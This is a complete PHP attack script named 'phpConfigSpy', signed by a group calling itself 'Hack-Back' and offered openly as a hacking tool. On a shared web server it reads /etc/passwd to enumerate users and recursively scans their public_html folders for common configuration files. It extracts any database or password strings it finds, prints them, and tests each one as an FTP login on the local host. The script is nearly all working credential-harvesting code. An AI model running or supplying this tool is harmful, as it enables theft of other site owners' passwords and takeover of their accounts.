Code:
<?php
/*
h-b@usa.com
*/
echo '<html><head><title>phpConfigSpy v0.3</title></head><body>';
($sm = ini_get('safe_mode') == 0) ? $sm = 'off': die('<b>Error: safe_mode = on</b>');
set_time_limit(0);
###################
@$passwd = fopen('/etc/passwd','r');
if (!$passwd) { die('<b>[-] Error : coudn`t read /etc/passwd</b>'); }
$pub = array();
$users = array();
$conf = array();
$i = 0;
while(!feof($passwd))
{
$str = fgets($passwd);
if ($i > 35)
{
$pos = strpos($str,':');
$username = substr($str,0,$pos);
$dirz = '/home/'.$username.'/public_html/';
if (($username != ''))
{
if (is_readable($dirz))
{
array_push($users,$username);
array_push($pub,$dirz);
}
}
}
$i++;
}
###################
echo '<br><br><textarea cols="80" rows="60">';
echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd\n";
echo "[+] Founded ".sizeof($pub)." readable public_html directories\n";
echo "[~] Searching for passwords in config files...\n\n";
foreach ($users as $user)
{
$path = "/home/$user/public_html/";
read_dir($path,$user);
}
echo "\n[+] Done\n";
function read_dir($path,$username)
{
if ($handle = opendir($path))
{
while (false !== ($file = readdir($handle)))
{
$fpath = "$path$file";
if (($file != '.') and ($file != '..'))
{
if (is_readable($fpath))
{
$dr = $fpath."/";
if (is_dir($dr))
{
read_dir($dr,$username);
}
else
{
if (
($file=='config.php')
or ($file=='config.inc.php')
or ($file=='conf.php')
or ($file=='settings.php')
or ($file=='setup.php')
or ($file=='order.php')
or ($file=='dbconf.php')
or ($file=='db.inc.php')
or ($file=='dbconfig.php')
or ($file=='configuration.php')
or ($file=='adminconfig.php')
or ($file=='configoption.php')
or ($file=='ini.inc.php')
or ($file=='configitem.php')
or ($file=='db.inc.php')
or ($file=='dbconnect.php')
or ($file=='conf-init.php')
or ($file=='dbinfo.php')
or ($file=='connect.php')
or ($file=='configure.php')
or ($file=='smtp.php')
or ($file=='include.php')
or ($file=='index.php')
or ($file=='common.php')
or ($file=='config_global.php')
or ($file=='admin.php')
or ($file=='db.php')
or ($file=='connect.inc.php')
or ($file=='dbconnect.inc.php'))
{
$pass = get_pass($fpath);
if ($pass != '')
{
echo "[+] $fpath\n$pass\n";
ftp_check($username,$pass);
}
}
}
}
}
}
}
}
function get_pass($link)
{
@$config = fopen($link,'r');
while(!feof($config))
{
$line = fgets($config);
if (strstr($line,'pass')
or strstr($line,'pwd')
or strstr($line,'db_pass')
or strstr($line,'dbpass')
or strstr($line,'passwd'))
{
if (strrpos($line,'"'))
{
preg_match("/(.*)[^=]\"(.*)\"/",$line,$pass);
$pass = str_replace("]=\"","",$pass);
}
else
preg_match("/(.*)[^=]\'(.*)\'/",$line,$pass);
$pass = str_replace("]='","",$pass);
return $pass[2];
}
}
}
function ftp_check($login,$pass)
{
@$ftp = ftp_connect('127.0.0.1');
if ($ftp)
{
@$res = ftp_login($ftp,$login,$pass);
if ($res)
{
echo '[FTP] '.$login.':'.$pass." Success !\n";
}
else ftp_quit($ftp);
}
}
echo '</textarea><br><br>Coded by <b>Hack-Back</b> & <b>config-location-2@@8</b> <a href=http://www.hac-zone.com></a></body></html>';
?>